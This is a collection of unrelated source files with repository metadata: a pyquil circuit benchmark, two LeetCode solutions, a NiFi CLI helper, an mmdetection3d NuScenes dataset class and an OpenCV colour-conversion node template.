6f7b09b3bc0afa1b87897d8811dee37992af9e92 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /benchmark/startPyquil1566.py | adf7d2e0df4b68ca67d20975984b7e68e9320ea4 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,272 | py | # qubit number=5
# total number=52
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
prog = Program() # circuit begin
prog += H(0) # number=3
prog += H(1) # number=4
prog += X(1) # number=48
prog += H(1) # number=26
prog += CZ(4,1) # number=27
prog += H(1) # number=28
prog += H(2) # number=5
prog += H(3) # number=6
prog += H(4) # number=21
prog += H(1) # number=34
prog += CZ(4,1) # number=35
prog += Z(4) # number=46
prog += RX(0.8011061266653969,2) # number=37
prog += H(1) # number=36
prog += H(0) # number=1
prog += H(1) # number=2
prog += H(2) # number=7
prog += H(3) # number=8
prog += CNOT(1,0) # number=38
prog += X(0) # number=39
prog += CNOT(1,0) # number=40
prog += CNOT(0,1) # number=42
prog += X(1) # number=43
prog += CNOT(0,1) # number=44
prog += X(2) # number=11
prog += Y(1) # number=45
prog += X(3) # number=12
prog += H(2) # number=41
prog += CNOT(1,0) # number=22
prog += X(4) # number=47
prog += X(0) # number=23
prog += H(0) # number=49
prog += CZ(1,0) # number=50
prog += H(0) # number=51
prog += CNOT(0,1) # number=30
prog += X(1) # number=31
prog += CNOT(0,1) # number=32
prog += X(2) # number=15
prog += H(4) # number=29
prog += X(3) # number=16
prog += H(0) # number=17
prog += H(1) # number=18
prog += H(2) # number=19
prog += H(3) # number=20
# circuit end
return prog
def summrise_results(bitstrings) -> dict:
d = {}
for l in bitstrings:
if d.get(l) is None:
d[l] = 1
else:
d[l] = d[l] + 1
return d
if __name__ == '__main__':
prog = make_circuit()
qvm = get_qc('5q-qvm')
results = qvm.run_and_measure(prog,1024)
bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
bitstrings = [''.join(map(str, l)) for l in bitstrings]
writefile = open("../data/startPyquil1566.csv","w")
print(summrise_results(bitstrings),file=writefile)
writefile.close()
| [
"[email protected]"
] | |
908076fe749518b81a5d792a64a0ac250dc8aa67 | 083ca3df7dba08779976d02d848315f85c45bf75 | /LongestSubstringwithAtLeastKRepeatingCharacters5.py | 424c18652d21975839cddc18e43a9e0b3e29a8f8 | [] | no_license | jiangshen95/UbuntuLeetCode | 6427ce4dc8d9f0f6e74475faced1bcaaa9fc9f94 | fa02b469344cf7c82510249fba9aa59ae0cb4cc0 | refs/heads/master | 2021-05-07T02:04:47.215580 | 2020-06-11T02:33:35 | 2020-06-11T02:33:35 | 110,397,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 954 | py | class Solution:
def longestSubstring(self, s, k):
"""
:type s: str
:type k: int
:rtype: int
"""
i = 0
res = 0
while i + k <= len(s):
if i > 0 and s[i] == s[i - 1]:
i += 1
continue
m = {}
mask = 0
max_index = i
for j in range(i, len(s)):
if s[j] not in m:
m[s[j]] = 0
m[s[j]] += 1
t = ord(s[j]) - ord('a')
if m[s[j]] < k:
mask |= 1 << t
else:
mask &= ~(1 << t)
if mask == 0:
max_index = j
res = max(res, j - i + 1)
i = max_index + 1
return res
if __name__ == '__main__':
s = input()
k = int(input())
solution = Solution()
print(solution.longestSubstring(s, k))
| [
"[email protected]"
] | |
7a7b0cb2ba35a1718311a5ace7ffe70e9f8f71bf | 7b221a4981edad73991cf1e357274b46c4054eff | /stacks/XIAOMATECH/1.0/services/NIFI/package/scripts/nifi_cli.py | e82f05e871857ac17cf7d7bf280d1558ca7ca3dc | [
"Apache-2.0"
] | permissive | aries-demos/dataops | a4e1516ef6205ad1ac5f692822e577e22ee85c70 | 436c6e89a1fdd0593a17815d3ec79c89a26d48f1 | refs/heads/master | 2020-05-29T17:20:12.854005 | 2019-05-22T06:06:00 | 2019-05-22T06:06:00 | 189,270,801 | 2 | 3 | Apache-2.0 | 2019-05-29T17:35:25 | 2019-05-29T17:35:24 | null | UTF-8 | Python | false | false | 6,474 | py | import json
import time
from resource_management.core import shell
from resource_management.core.exceptions import Fail
from resource_management.core.logger import Logger
from resource_management.libraries.functions import format
import nifi_toolkit_util_common
def nifi_cli(command=None,
subcommand=None,
errors_retries=12,
retries_pause=10,
acceptable_errors=None,
**command_args):
"""
Executes nifi cli command and returns its output.
We need execute command several times because nifi becomes responsive after some among of time.
On non super-fast vm it takes 1.5 minutes to get nifi responding for cli calls.
Also some commands can produce different errors but after some time that errors disappear.
In other works - this cli is hard to use in automated environments :).
:param command: main cli command(nifi, registry, session, etc)
:param subcommand: sub-command of main command(nifi list-reg-clients, etc)
:param errors_retries: retries count on acceptable errors
:param retries_pause: pause between call retries
:param acceptable_errors: errors that is acceptable for retry("Connection refused" error always in this list)
:param command_args: long version of command parameters
:return: command output
"""
import params
cli_env = {"JAVA_HOME": params.java_home}
cli_script = nifi_toolkit_util_common.get_toolkit_script(
"cli.sh", params.toolkit_tmp_dir, params.stack_version_buildnum)
if errors_retries < 1:
errors_retries = 1
if acceptable_errors is None:
acceptable_errors = []
acceptable_errors.append("Connection refused")
def do_retry(output):
for acceptable_error in acceptable_errors:
if acceptable_error in output:
return True
return False
cmd = [cli_script, command]
if subcommand is not None:
cmd.append(subcommand)
client_opts = nifi_toolkit_util_common.get_client_opts()
if params.nifi_ssl_enabled:
command_args.update(nifi_toolkit_util_common.get_client_opts())
command_args["proxiedEntity"] = params.nifi_initial_admin_id
else:
command_args["baseUrl"] = client_opts["baseUrl"]
for arg_name, arg_value in command_args.iteritems():
cmd.append("--" + arg_name)
cmd.append(arg_value)
for _ in range(0, errors_retries):
errors_retries -= 1
code, out = shell.call(
cmd, sudo=True, env=cli_env, logoutput=False, quiet=True)
if code != 0 and do_retry(out) and errors_retries != 0:
time.sleep(retries_pause)
continue
elif code == 0:
return out
else:
raise Fail("Failed to execute nifi cli.sh command")
def _update_impl(client_name=None,
client_id=None,
client_url=None,
existing_clients=None):
old_name = None
old_url = None
if not client_id:
if not client_name:
raise Fail(
"For client update 'client_name' or 'client_id' must be specified"
)
for description, name, uuid, url in existing_clients:
if name == client_name:
client_id = uuid
old_name = name
old_url = url
break
else:
for description, name, uuid, url in existing_clients:
if uuid == client_id:
old_name = name
old_url = url
arguments = {"registryClientId": client_id}
do_update = False
if client_name:
if client_name != old_name:
arguments["registryClientName"] = client_name
do_update = True
Logger.info(
format(
"Trying to update NIFI Client name '{old_name}' to '{client_name}'"
))
if client_url:
if client_url != old_url:
arguments["registryClientUrl"] = client_url
do_update = True
Logger.info(
format(
"Trying update url from '{old_url}' to '{client_url}' for NIFI Client with name '{old_name}'"
))
if do_update:
nifi_cli(command="nifi", subcommand="update-reg-client", **arguments)
Logger.info(format("NIFI Client '{old_name}' updated"))
else:
Logger.info(format("NIFI Client '{old_name}' is already up-to-date"))
return client_id
def create_reg_client(client_name, client_url):
client_uuid = nifi_cli(
command="nifi",
subcommand="create-reg-client",
registryClientName=client_name,
registryClientUrl=client_url).strip()
Logger.info(
format("Created NIFI client '{client_name}' with url '{client_url}'"))
return client_uuid
def list_reg_clients():
acceptable_errors = ["Error retrieving registry clients"]
Logger.info(format("Trying to retrieve NIFI clients..."))
command_result = nifi_cli(
command="nifi",
subcommand="list-reg-clients",
acceptable_errors=acceptable_errors,
outputType="json")
result_json = json.loads(command_result)
result = []
if "registries" in result_json:
for registry in result_json["registries"]:
if "component" in registry:
component = registry["component"]
if "description" in component:
description = component["description"]
else:
description = ''
result.append((description, component["name"], component["id"],
component["uri"]))
Logger.info("Retrieved:" + str(len(result)) + " clients")
return result
def update_reg_client(client_name=None, client_id=None, client_url=None):
existing_clients = list_reg_clients()
return _update_impl(
client_name=client_name,
client_id=client_id,
client_url=client_url,
existing_clients=existing_clients)
def create_or_update_reg_client(client_name, client_url):
existing_clients = list_reg_clients()
for _, name, uuid, _ in existing_clients:
if name == client_name:
return _update_impl(
client_id=uuid,
client_url=client_url,
existing_clients=existing_clients)
return create_reg_client(client_name, client_url)
| [
"[email protected]"
] | |
cbb9422f0b2cd4ef151418716fb78d78a14bcad9 | 8ef8e6818c977c26d937d09b46be0d748022ea09 | /cv/3d_detection/BEVFormer/pytorch/mmdetection3d/mmdet3d/datasets/nuscenes_dataset.py | 47d6e15ed9aec63b17e5b80955dd4cb32ba04939 | [
"Apache-2.0"
] | permissive | Deep-Spark/DeepSparkHub | eb5996607e63ccd2c706789f64b3cc0070e7f8ef | 9d643e88946fc4a24f2d4d073c08b05ea693f4c5 | refs/heads/master | 2023-09-01T11:26:49.648759 | 2023-08-25T01:50:18 | 2023-08-25T01:50:18 | 534,133,249 | 7 | 6 | Apache-2.0 | 2023-03-28T02:54:59 | 2022-09-08T09:07:01 | Python | UTF-8 | Python | false | false | 26,116 | py | # Copyright (c) OpenMMLab. All rights reserved.
import tempfile
from os import path as osp
import mmcv
import numpy as np
import pyquaternion
from nuscenes.utils.data_classes import Box as NuScenesBox
from ..core import show_result
from ..core.bbox import Box3DMode, Coord3DMode, LiDARInstance3DBoxes
from .builder import DATASETS
from .custom_3d import Custom3DDataset
from .pipelines import Compose
@DATASETS.register_module()
class NuScenesDataset(Custom3DDataset):
r"""NuScenes Dataset.
This class serves as the API for experiments on the NuScenes Dataset.
Please refer to `NuScenes Dataset <https://www.nuscenes.org/download>`_
for data downloading.
Args:
ann_file (str): Path of annotation file.
pipeline (list[dict], optional): Pipeline used for data processing.
Defaults to None.
data_root (str): Path of dataset root.
classes (tuple[str], optional): Classes used in the dataset.
Defaults to None.
load_interval (int, optional): Interval of loading the dataset. It is
used to uniformly sample the dataset. Defaults to 1.
with_velocity (bool, optional): Whether include velocity prediction
into the experiments. Defaults to True.
modality (dict, optional): Modality to specify the sensor data used
as input. Defaults to None.
box_type_3d (str, optional): Type of 3D box of this dataset.
Based on the `box_type_3d`, the dataset will encapsulate the box
to its original format then converted them to `box_type_3d`.
Defaults to 'LiDAR' in this dataset. Available options includes.
- 'LiDAR': Box in LiDAR coordinates.
- 'Depth': Box in depth coordinates, usually for indoor dataset.
- 'Camera': Box in camera coordinates.
filter_empty_gt (bool, optional): Whether to filter empty GT.
Defaults to True.
test_mode (bool, optional): Whether the dataset is in test mode.
Defaults to False.
eval_version (bool, optional): Configuration version of evaluation.
Defaults to 'detection_cvpr_2019'.
use_valid_flag (bool, optional): Whether to use `use_valid_flag` key
in the info file as mask to filter gt_boxes and gt_names.
Defaults to False.
"""
NameMapping = {
'movable_object.barrier': 'barrier',
'vehicle.bicycle': 'bicycle',
'vehicle.bus.bendy': 'bus',
'vehicle.bus.rigid': 'bus',
'vehicle.car': 'car',
'vehicle.construction': 'construction_vehicle',
'vehicle.motorcycle': 'motorcycle',
'human.pedestrian.adult': 'pedestrian',
'human.pedestrian.child': 'pedestrian',
'human.pedestrian.construction_worker': 'pedestrian',
'human.pedestrian.police_officer': 'pedestrian',
'movable_object.trafficcone': 'traffic_cone',
'vehicle.trailer': 'trailer',
'vehicle.truck': 'truck'
}
DefaultAttribute = {
'car': 'vehicle.parked',
'pedestrian': 'pedestrian.moving',
'trailer': 'vehicle.parked',
'truck': 'vehicle.parked',
'bus': 'vehicle.moving',
'motorcycle': 'cycle.without_rider',
'construction_vehicle': 'vehicle.parked',
'bicycle': 'cycle.without_rider',
'barrier': '',
'traffic_cone': '',
}
AttrMapping = {
'cycle.with_rider': 0,
'cycle.without_rider': 1,
'pedestrian.moving': 2,
'pedestrian.standing': 3,
'pedestrian.sitting_lying_down': 4,
'vehicle.moving': 5,
'vehicle.parked': 6,
'vehicle.stopped': 7,
}
AttrMapping_rev = [
'cycle.with_rider',
'cycle.without_rider',
'pedestrian.moving',
'pedestrian.standing',
'pedestrian.sitting_lying_down',
'vehicle.moving',
'vehicle.parked',
'vehicle.stopped',
]
# https://github.com/nutonomy/nuscenes-devkit/blob/57889ff20678577025326cfc24e57424a829be0a/python-sdk/nuscenes/eval/detection/evaluate.py#L222 # noqa
ErrNameMapping = {
'trans_err': 'mATE',
'scale_err': 'mASE',
'orient_err': 'mAOE',
'vel_err': 'mAVE',
'attr_err': 'mAAE'
}
CLASSES = ('car', 'truck', 'trailer', 'bus', 'construction_vehicle',
'bicycle', 'motorcycle', 'pedestrian', 'traffic_cone',
'barrier')
def __init__(self,
ann_file,
pipeline=None,
data_root=None,
classes=None,
load_interval=1,
with_velocity=True,
modality=None,
box_type_3d='LiDAR',
filter_empty_gt=True,
test_mode=False,
eval_version='detection_cvpr_2019',
use_valid_flag=False):
self.load_interval = load_interval
self.use_valid_flag = use_valid_flag
super().__init__(
data_root=data_root,
ann_file=ann_file,
pipeline=pipeline,
classes=classes,
modality=modality,
box_type_3d=box_type_3d,
filter_empty_gt=filter_empty_gt,
test_mode=test_mode)
self.with_velocity = with_velocity
self.eval_version = eval_version
from nuscenes.eval.detection.config import config_factory
self.eval_detection_configs = config_factory(self.eval_version)
if self.modality is None:
self.modality = dict(
use_camera=False,
use_lidar=True,
use_radar=False,
use_map=False,
use_external=False,
)
def get_cat_ids(self, idx):
"""Get category distribution of single scene.
Args:
idx (int): Index of the data_info.
Returns:
dict[list]: for each category, if the current scene
contains such boxes, store a list containing idx,
otherwise, store empty list.
"""
info = self.data_infos[idx]
if self.use_valid_flag:
mask = info['valid_flag']
gt_names = set(info['gt_names'][mask])
else:
gt_names = set(info['gt_names'])
cat_ids = []
for name in gt_names:
if name in self.CLASSES:
cat_ids.append(self.cat2id[name])
return cat_ids
def load_annotations(self, ann_file):
"""Load annotations from ann_file.
Args:
ann_file (str): Path of the annotation file.
Returns:
list[dict]: List of annotations sorted by timestamps.
"""
data = mmcv.load(ann_file, file_format='pkl')
data_infos = list(sorted(data['infos'], key=lambda e: e['timestamp']))
data_infos = data_infos[::self.load_interval]
self.metadata = data['metadata']
self.version = self.metadata['version']
return data_infos
def get_data_info(self, index):
"""Get data info according to the given index.
Args:
index (int): Index of the sample data to get.
Returns:
dict: Data information that will be passed to the data
preprocessing pipelines. It includes the following keys:
- sample_idx (str): Sample index.
- pts_filename (str): Filename of point clouds.
- sweeps (list[dict]): Infos of sweeps.
- timestamp (float): Sample timestamp.
- img_filename (str, optional): Image filename.
- lidar2img (list[np.ndarray], optional): Transformations
from lidar to different cameras.
- ann_info (dict): Annotation info.
"""
info = self.data_infos[index]
# standard protocol modified from SECOND.Pytorch
input_dict = dict(
sample_idx=info['token'],
pts_filename=info['lidar_path'],
sweeps=info['sweeps'],
timestamp=info['timestamp'] / 1e6,
)
if self.modality['use_camera']:
image_paths = []
lidar2img_rts = []
for cam_type, cam_info in info['cams'].items():
image_paths.append(cam_info['data_path'])
# obtain lidar to image transformation matrix
lidar2cam_r = np.linalg.inv(cam_info['sensor2lidar_rotation'])
lidar2cam_t = cam_info[
'sensor2lidar_translation'] @ lidar2cam_r.T
lidar2cam_rt = np.eye(4)
lidar2cam_rt[:3, :3] = lidar2cam_r.T
lidar2cam_rt[3, :3] = -lidar2cam_t
intrinsic = cam_info['cam_intrinsic']
viewpad = np.eye(4)
viewpad[:intrinsic.shape[0], :intrinsic.shape[1]] = intrinsic
lidar2img_rt = (viewpad @ lidar2cam_rt.T)
lidar2img_rts.append(lidar2img_rt)
input_dict.update(
dict(
img_filename=image_paths,
lidar2img=lidar2img_rts,
))
if not self.test_mode:
annos = self.get_ann_info(index)
input_dict['ann_info'] = annos
return input_dict
def get_ann_info(self, index):
"""Get annotation info according to the given index.
Args:
index (int): Index of the annotation data to get.
Returns:
dict: Annotation information consists of the following keys:
- gt_bboxes_3d (:obj:`LiDARInstance3DBoxes`):
3D ground truth bboxes
- gt_labels_3d (np.ndarray): Labels of ground truths.
- gt_names (list[str]): Class names of ground truths.
"""
info = self.data_infos[index]
# filter out bbox containing no points
if self.use_valid_flag:
mask = info['valid_flag']
else:
mask = info['num_lidar_pts'] > 0
gt_bboxes_3d = info['gt_boxes'][mask]
gt_names_3d = info['gt_names'][mask]
gt_labels_3d = []
for cat in gt_names_3d:
if cat in self.CLASSES:
gt_labels_3d.append(self.CLASSES.index(cat))
else:
gt_labels_3d.append(-1)
gt_labels_3d = np.array(gt_labels_3d)
if self.with_velocity:
gt_velocity = info['gt_velocity'][mask]
nan_mask = np.isnan(gt_velocity[:, 0])
gt_velocity[nan_mask] = [0.0, 0.0]
gt_bboxes_3d = np.concatenate([gt_bboxes_3d, gt_velocity], axis=-1)
# the nuscenes box center is [0.5, 0.5, 0.5], we change it to be
# the same as KITTI (0.5, 0.5, 0)
gt_bboxes_3d = LiDARInstance3DBoxes(
gt_bboxes_3d,
box_dim=gt_bboxes_3d.shape[-1],
origin=(0.5, 0.5, 0.5)).convert_to(self.box_mode_3d)
anns_results = dict(
gt_bboxes_3d=gt_bboxes_3d,
gt_labels_3d=gt_labels_3d,
gt_names=gt_names_3d)
return anns_results
def _format_bbox(self, results, jsonfile_prefix=None):
"""Convert the results to the standard format.
Args:
results (list[dict]): Testing results of the dataset.
jsonfile_prefix (str): The prefix of the output jsonfile.
You can specify the output directory/filename by
modifying the jsonfile_prefix. Default: None.
Returns:
str: Path of the output json file.
"""
nusc_annos = {}
mapped_class_names = self.CLASSES
print('Start to convert detection format...')
for sample_id, det in enumerate(mmcv.track_iter_progress(results)):
annos = []
boxes = output_to_nusc_box(det, self.with_velocity)
sample_token = self.data_infos[sample_id]['token']
boxes = lidar_nusc_box_to_global(self.data_infos[sample_id], boxes,
mapped_class_names,
self.eval_detection_configs,
self.eval_version)
for i, box in enumerate(boxes):
name = mapped_class_names[box.label]
if np.sqrt(box.velocity[0]**2 + box.velocity[1]**2) > 0.2:
if name in [
'car',
'construction_vehicle',
'bus',
'truck',
'trailer',
]:
attr = 'vehicle.moving'
elif name in ['bicycle', 'motorcycle']:
attr = 'cycle.with_rider'
else:
attr = NuScenesDataset.DefaultAttribute[name]
else:
if name in ['pedestrian']:
attr = 'pedestrian.standing'
elif name in ['bus']:
attr = 'vehicle.stopped'
else:
attr = NuScenesDataset.DefaultAttribute[name]
nusc_anno = dict(
sample_token=sample_token,
translation=box.center.tolist(),
size=box.wlh.tolist(),
rotation=box.orientation.elements.tolist(),
velocity=box.velocity[:2].tolist(),
detection_name=name,
detection_score=box.score,
attribute_name=attr)
annos.append(nusc_anno)
nusc_annos[sample_token] = annos
nusc_submissions = {
'meta': self.modality,
'results': nusc_annos,
}
mmcv.mkdir_or_exist(jsonfile_prefix)
res_path = osp.join(jsonfile_prefix, 'results_nusc.json')
print('Results writes to', res_path)
mmcv.dump(nusc_submissions, res_path)
return res_path
def _evaluate_single(self,
result_path,
logger=None,
metric='bbox',
result_name='pts_bbox'):
"""Evaluation for a single model in nuScenes protocol.
Args:
result_path (str): Path of the result file.
logger (logging.Logger | str, optional): Logger used for printing
related information during evaluation. Default: None.
metric (str, optional): Metric name used for evaluation.
Default: 'bbox'.
result_name (str, optional): Result name in the metric prefix.
Default: 'pts_bbox'.
Returns:
dict: Dictionary of evaluation details.
"""
from nuscenes import NuScenes
from nuscenes.eval.detection.evaluate import NuScenesEval
output_dir = osp.join(*osp.split(result_path)[:-1])
nusc = NuScenes(
version=self.version, dataroot=self.data_root, verbose=False)
eval_set_map = {
'v1.0-mini': 'mini_val',
'v1.0-trainval': 'val',
}
nusc_eval = NuScenesEval(
nusc,
config=self.eval_detection_configs,
result_path=result_path,
eval_set=eval_set_map[self.version],
output_dir=output_dir,
verbose=False)
nusc_eval.main(render_curves=False)
# record metrics
metrics = mmcv.load(osp.join(output_dir, 'metrics_summary.json'))
detail = dict()
metric_prefix = f'{result_name}_NuScenes'
for name in self.CLASSES:
for k, v in metrics['label_aps'][name].items():
val = float('{:.4f}'.format(v))
detail['{}/{}_AP_dist_{}'.format(metric_prefix, name, k)] = val
for k, v in metrics['label_tp_errors'][name].items():
val = float('{:.4f}'.format(v))
detail['{}/{}_{}'.format(metric_prefix, name, k)] = val
for k, v in metrics['tp_errors'].items():
val = float('{:.4f}'.format(v))
detail['{}/{}'.format(metric_prefix,
self.ErrNameMapping[k])] = val
detail['{}/NDS'.format(metric_prefix)] = metrics['nd_score']
detail['{}/mAP'.format(metric_prefix)] = metrics['mean_ap']
return detail
def format_results(self, results, jsonfile_prefix=None):
"""Format the results to json (standard format for COCO evaluation).
Args:
results (list[dict]): Testing results of the dataset.
jsonfile_prefix (str): The prefix of json files. It includes
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
Returns:
tuple: Returns (result_files, tmp_dir), where `result_files` is a
dict containing the json filepaths, `tmp_dir` is the temporal
directory created for saving json files when
`jsonfile_prefix` is not specified.
"""
assert isinstance(results, list), 'results must be a list'
assert len(results) == len(self), (
'The length of results is not equal to the dataset len: {} != {}'.
format(len(results), len(self)))
if jsonfile_prefix is None:
tmp_dir = tempfile.TemporaryDirectory()
jsonfile_prefix = osp.join(tmp_dir.name, 'results')
else:
tmp_dir = None
# currently the output prediction results could be in two formats
# 1. list of dict('boxes_3d': ..., 'scores_3d': ..., 'labels_3d': ...)
# 2. list of dict('pts_bbox' or 'img_bbox':
# dict('boxes_3d': ..., 'scores_3d': ..., 'labels_3d': ...))
# this is a workaround to enable evaluation of both formats on nuScenes
# refer to https://github.com/open-mmlab/mmdetection3d/issues/449
if not ('pts_bbox' in results[0] or 'img_bbox' in results[0]):
result_files = self._format_bbox(results, jsonfile_prefix)
else:
# should take the inner dict out of 'pts_bbox' or 'img_bbox' dict
result_files = dict()
for name in results[0]:
print(f'\nFormating bboxes of {name}')
results_ = [out[name] for out in results]
tmp_file_ = osp.join(jsonfile_prefix, name)
result_files.update(
{name: self._format_bbox(results_, tmp_file_)})
return result_files, tmp_dir
def evaluate(self,
results,
metric='bbox',
logger=None,
jsonfile_prefix=None,
result_names=['pts_bbox'],
show=False,
out_dir=None,
pipeline=None):
"""Evaluation in nuScenes protocol.
Args:
results (list[dict]): Testing results of the dataset.
metric (str | list[str], optional): Metrics to be evaluated.
Default: 'bbox'.
logger (logging.Logger | str, optional): Logger used for printing
related information during evaluation. Default: None.
jsonfile_prefix (str, optional): The prefix of json files including
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
show (bool, optional): Whether to visualize.
Default: False.
out_dir (str, optional): Path to save the visualization results.
Default: None.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
Returns:
dict[str, float]: Results of each evaluation metric.
"""
result_files, tmp_dir = self.format_results(results, jsonfile_prefix)
if isinstance(result_files, dict):
results_dict = dict()
for name in result_names:
print('Evaluating bboxes of {}'.format(name))
ret_dict = self._evaluate_single(result_files[name])
results_dict.update(ret_dict)
elif isinstance(result_files, str):
results_dict = self._evaluate_single(result_files)
if tmp_dir is not None:
tmp_dir.cleanup()
if show or out_dir:
self.show(results, out_dir, show=show, pipeline=pipeline)
return results_dict
def _build_default_pipeline(self):
"""Build the default pipeline for this dataset."""
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='LIDAR',
load_dim=5,
use_dim=5,
file_client_args=dict(backend='disk')),
dict(
type='LoadPointsFromMultiSweeps',
sweeps_num=10,
file_client_args=dict(backend='disk')),
dict(
type='DefaultFormatBundle3D',
class_names=self.CLASSES,
with_label=False),
dict(type='Collect3D', keys=['points'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=False, pipeline=None):
"""Results visualization.
Args:
results (list[dict]): List of bounding boxes results.
out_dir (str): Output directory of visualization result.
show (bool): Whether to visualize the results online.
Default: False.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
"""
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
if 'pts_bbox' in result.keys():
result = result['pts_bbox']
data_info = self.data_infos[i]
pts_path = data_info['lidar_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points = self._extract_data(i, pipeline, 'points').numpy()
# for now we convert points into depth mode
points = Coord3DMode.convert_point(points, Coord3DMode.LIDAR,
Coord3DMode.DEPTH)
inds = result['scores_3d'] > 0.1
gt_bboxes = self.get_ann_info(i)['gt_bboxes_3d'].tensor.numpy()
show_gt_bboxes = Box3DMode.convert(gt_bboxes, Box3DMode.LIDAR,
Box3DMode.DEPTH)
pred_bboxes = result['boxes_3d'][inds].tensor.numpy()
show_pred_bboxes = Box3DMode.convert(pred_bboxes, Box3DMode.LIDAR,
Box3DMode.DEPTH)
show_result(points, show_gt_bboxes, show_pred_bboxes, out_dir,
file_name, show)
def output_to_nusc_box(detection, with_velocity=True):
"""Convert the output to the box class in the nuScenes.
Args:
detection (dict): Detection results.
- boxes_3d (:obj:`BaseInstance3DBoxes`): Detection bbox.
- scores_3d (torch.Tensor): Detection scores.
- labels_3d (torch.Tensor): Predicted box labels.
Returns:
list[:obj:`NuScenesBox`]: List of standard NuScenesBoxes.
"""
box3d = detection['boxes_3d']
scores = detection['scores_3d'].numpy()
labels = detection['labels_3d'].numpy()
box_gravity_center = box3d.gravity_center.numpy()
box_dims = box3d.dims.numpy()
box_yaw = box3d.yaw.numpy()
# our LiDAR coordinate system -> nuScenes box coordinate system
nus_box_dims = box_dims[:, [1, 0, 2]]
box_list = []
for i in range(len(box3d)):
quat = pyquaternion.Quaternion(axis=[0, 0, 1], radians=box_yaw[i])
if with_velocity:
velocity = (*box3d.tensor[i, 7:9], 0.0)
else:
velocity = (0, 0, 0)
# velo_val = np.linalg.norm(box3d[i, 7:9])
# velo_ori = box3d[i, 6]
# velocity = (
# velo_val * np.cos(velo_ori), velo_val * np.sin(velo_ori), 0.0)
box = NuScenesBox(
box_gravity_center[i],
nus_box_dims[i],
quat,
label=labels[i],
score=scores[i],
velocity=velocity)
box_list.append(box)
return box_list
def lidar_nusc_box_to_global(info,
boxes,
classes,
eval_configs,
eval_version='detection_cvpr_2019'):
"""Convert the box from ego to global coordinate.
Args:
info (dict): Info for a specific sample data, including the
calibration information.
boxes (list[:obj:`NuScenesBox`]): List of predicted NuScenesBoxes.
classes (list[str]): Mapped classes in the evaluation.
eval_configs (object): Evaluation configuration object.
eval_version (str, optional): Evaluation version.
Default: 'detection_cvpr_2019'
Returns:
list: List of standard NuScenesBoxes in the global
coordinate.
"""
box_list = []
for box in boxes:
# Move box to ego vehicle coord system
box.rotate(pyquaternion.Quaternion(info['lidar2ego_rotation']))
box.translate(np.array(info['lidar2ego_translation']))
# filter det in ego.
cls_range_map = eval_configs.class_range
radius = np.linalg.norm(box.center[:2], 2)
det_range = cls_range_map[classes[box.label]]
if radius > det_range:
continue
# Move box to global coord system
box.rotate(pyquaternion.Quaternion(info['ego2global_rotation']))
box.translate(np.array(info['ego2global_translation']))
box_list.append(box)
return box_list
| [
"[email protected]"
] | |
ef18e320c181d7603f6cc50f8b4c007b64c977e5 | b8d2f095a4b7ea567ccc61ee318ba879318eec3d | /二分查找/287. 寻找重复数.py | 69bdb06bf5dbca40a1db1643ecf3e21552f93868 | [] | no_license | f1amingo/leetcode-python | a3ef78727ae696fe2e94896258cfba1b7d58b1e3 | b365ba85036e51f7a9e018767914ef22314a6780 | refs/heads/master | 2021-11-10T16:19:27.603342 | 2021-09-17T03:12:59 | 2021-09-17T03:12:59 | 205,813,698 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | from typing import List
class Solution:
# 从[1, n]中猜一个数,再遍历一遍原数组
def findDuplicate(self, nums: List[int]) -> int:
n = len(nums) - 1
lt, rt = 1, n
while lt < rt:
mid = (lt + rt) // 2
count = 0
for num in nums:
if num <= mid:
count += 1
if count > mid:
rt = mid
else:
lt = mid + 1
return lt
assert Solution().findDuplicate([1, 3, 4, 2, 2]) == 2
assert Solution().findDuplicate([3, 1, 3, 4, 2]) == 3
| [
"[email protected]"
] | |
028d4012be6e2dba637d5afdafcded11bfba6024 | fd8d33572656edf9e1133a72ad4e2fa090f90a5f | /packages/OpenCV/nodes/OpenCV___YUV_YV120/OpenCV___YUV_YV120___METACODE.py | fd27f158254de61c8a19e271393e77c1740baba6 | [
"MIT"
] | permissive | ChristianHohlfeld/Ryven | a01c2eafa79a80883a9490efb5f043fd35f53484 | 53bf7e57a7b0fa25a704cd0d2214a7f76096d4dd | refs/heads/master | 2022-12-12T22:03:57.122034 | 2020-08-31T13:45:45 | 2020-08-31T13:45:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,153 | py | from NIENV import *
import cv2
# USEFUL
# self.input(index) <- access to input data
# self.outputs[index].set_val(val) <- set output data port value
# self.main_widget <- access to main widget
class %NODE_TITLE%_NodeInstance(NodeInstance):
def __init__(self, parent_node: Node, flow, configuration=None):
super(%NODE_TITLE%_NodeInstance, self).__init__(parent_node, flow, configuration)
# self.special_actions['action name'] = {'method': M(self.action_method)}
self.img_unYUV_YV12 = None
self.img_YUV_YV12 = None
self.initialized()
def update_event(self, input_called=-1):
self.img_unYUV_YV12 = self.input(0)
self.img_YUV_YV12 = cv2.cvtColor(self.img_unYUV_YV12,cv2.COLOR_BGRA2YUV_YV12)
#self.cnvt=cv2.imshow('gray_image',self.img_YUV_I420)
self.main_widget.show_image(self.img_YUV_YV12)
self.set_output_val(0, self.img_YUV_YV12)
def get_data(self):
data = {}
# ...
return data
def set_data(self, data):
pass
# ...
def remove_event(self):
pass
| [
"[email protected]"
] | |
